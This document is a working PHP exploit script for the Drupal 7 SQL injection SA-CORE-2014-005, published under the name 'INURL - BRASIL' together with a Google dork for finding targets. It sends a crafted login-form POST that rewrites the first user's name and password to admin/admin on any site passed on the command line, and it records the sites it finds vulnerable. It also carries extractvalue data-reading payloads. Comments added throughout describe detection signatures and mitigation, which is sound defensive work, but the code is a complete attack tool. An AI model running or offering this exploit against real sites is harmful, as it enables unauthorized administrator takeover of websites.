
[EXPLOIT] Drupal 7.x SQL Injection / INURL - BRASIL

<?php

/* Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
  ----------------------------------------------------------
 * Drupal 7 SQL Injection vulnerability demo
 * Read more at http://milankragujevic.com/post/66
 * This will change the first user's username to admin
 * and their password to admin
 * Change $url to the website URL
  ----------------------------------------------------------
 * EXTRA INFO:
 * http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
 * http://pastebin.com/nDwLFV3v
 * https://www.youtube.com/watch?v=rHwJYD_yTlM
 * DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  ----------------------------------------------------------
 * Script exploit developed by INURL - BRAZIL
 * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
 * EMAIL*: inurllbr@gmail.com
 * Blog*: http://blog.inurl.com.br
 * Twitter*: https://twitter.com/googleinurl
 * Fanpage*: https://fb.com/InurlBrasil
 * GIT*: https://github.com/googleinurl
 * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  ----------------------------------------------------------
 *
 * DORK: " Powered by Drupal" inurl:"user/register"
 *
 */

/*
 * Reviewer notes (defensive context for this proof-of-concept):
 * - The weakness is the one described in SA-CORE-2014-005 (linked above): the
 *   key of an array-valued form field is carried into SQL by the Drupal 7
 *   database layer's placeholder expansion, so a crafted key becomes executed
 *   SQL. Mitigation is the core update published with that advisory.
 * - The payload in $params['post'] below *writes* to the users table (it does
 *   not merely read data), so a site that was exposed before patching should be
 *   assumed modified and restored from a known-good state, not just updated.
 * - Detection: a POST to the login block (form_id=user_login_block, path
 *   ?q=node&destination=node) whose `name[` field *key* contains SQL keywords
 *   (update, select, extractvalue) is the request shape to alert on in
 *   web-server or WAF logs; the PHP warning that __request() looks for in the
 *   response is the matching server-side trace in the PHP/web error log.
 */

// Runtime setup: error_reporting(1) enables E_ERROR only and display_errors
// sends it to stdout (this is a CLI script, see $argv below). set_time_limit(0)
// and max_execution_time=0 remove the execution cap; the two ob_* calls make
// output appear as soon as it is echoed.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
//echo '<pre>';

// Target URL comes from argv[1]; the ternary's false branch calls exit() with a
// usage line, so nothing below runs without a URL. Output log path is argv[2],
// defaulting to a file in the current working directory.
$params['url'] = isset($argv[1]) && !empty($argv[1]) ? $argv[1] : exit("SET TARGET URL ex: php exploitDrupal7.php http://target.com save.txt");
$params['output'] = isset($argv[2]) && !empty($argv[2]) ? $argv[2] : 'OUTPUT_INURL_DRUPAL7.txt';
// Payload. The SQL sits in the key of the `name[...]` field, URL-encoded
// (%20 = space, %3D/%3d = '='). It is an UPDATE on the users table that sets
// uid 1's name to 'admin' and pass to a hard-coded Drupal 7 password hash
// ($S$ prefix); per the header comment that hash corresponds to "admin". The
// other fields (name[0], pass, form_build_id, form_id, op) make the request
// look like an ordinary login-block submission.
// Indicator for responders: a users row with uid 1, name 'admin' and exactly
// this pass value was written by this tool or a variant of it.
$params['post'] = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
// Query string appended to the target URL by __request(); together with
// form_id=user_login_block this is the access-log signature of the request.
$params['url_request'] = '?q=node&destination=node';


//EXAMPLE INJECTIONS - http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
//
// Reference copies of variants observed in the wild (see the Sucuri link):
// error-based reads through extractvalue(1, concat(0x5c, ...)). Note that
// $params['post1'] is assigned twice and is never read by __request(), which
// only sends $params['post'] -- both strings are inert in this script. For
// detection purposes, `extractvalue(` or `concat(0x5c` inside a form field
// *name* is a strong signature for this family of requests.
//
//users passwords:
$params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

//select information_schema.tables (overwrites the assignment above):
$params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select md5(1122) from
information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed&
removed=removed&form_build_id=&form_id=user_login_block&op=Log+in";
  56.  
/**
 * Sends the crafted login-form POST to $params['url'] . $params['url_request']
 * and reports whether the response body carries the PHP warning a vulnerable
 * site emits.
 *
 * Reads $params['url'], ['url_request'], ['post'] and ['output']. Writes a
 * result block to stdout and, on a positive match, appends it to the file named
 * by $params['output']. Returns nothing.
 *
 * Response-side oracle: "mb_strlen() expects parameter 1 to be string" is the
 * PHP warning raised when the array-valued name field reaches a string function
 * on the server. For responders, that warning in the PHP/web error log next to
 * a POST to the login form is the server-side trace of this payload; it shows
 * the request was processed, not that the UPDATE itself succeeded.
 */
function __request($params) {

    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL, $params['url'] . $params['url_request']);
    // Return the response as a string, with the HTTP headers prepended to it.
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    // Static request fingerprint: a fixed User-Agent, a fixed Cookie value that
    // is unrelated to Drupal, and Accept/X-Requested-With headers that mimic an
    // AJAX form submit. All of these are usable as log signatures for this tool.
    curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        "Referer: {$params['url']}",
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));
    // Referer is set a second time here (the header above already carries one).
    // Setting CURLOPT_POSTFIELDS is what turns this request into a POST.
    curl_setopt($objcurl, CURLOPT_REFERER, $params['url'] . $params['url_request']);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);

    $corpo = curl_exec($objcurl);
    curl_close($objcurl);

    // The `&& $corpo` guard is evaluated after stristr(), so a false from
    // curl_exec() still reaches stristr() (treated as "") and falls through to
    // the else branch.
    if (stristr($corpo, 'mb_strlen() expects parameter 1 to be string') && $corpo) {
        // Positive match: print a dated record (date() uses the configured
        // default timezone) and append the same text to the output file.
        echo "[INFO]: VULNERABLE! Log in with username \"admin\" and password \"admin\" at {$params['url']}/user/login \n";
        echo "[INFO][OUTPUT]: {$params['output']}\n";
        $output = "-------------------------------------\n";
        $output.= "[INFO][URL]: {$params['url']}/user/login\n";
        $output.= "[INFO][LOGIN]: admin / pass: admin\n";
        $output.= "[INFO][DATE]: " . date("d-m-Y H:i:s");
        $output.= "\n-------------------------------------\n\n";
        echo $output;
        file_put_contents($params['output'], $output, FILE_APPEND);
    } else {
        // Negative result is ambiguous: a patched site, a site that does not
        // display PHP warnings, or no connectivity all land here. This is not a
        // reliable vulnerability test for site owners; rely on the core version
        // and the advisory instead.
        echo "[INFO]: NOT Vulnerable , or your Internet isn't working. \n\n";
    }
}
  92.  
// Entry point: one request against the target URL taken from the command line.
//EXECUTE
__request($params);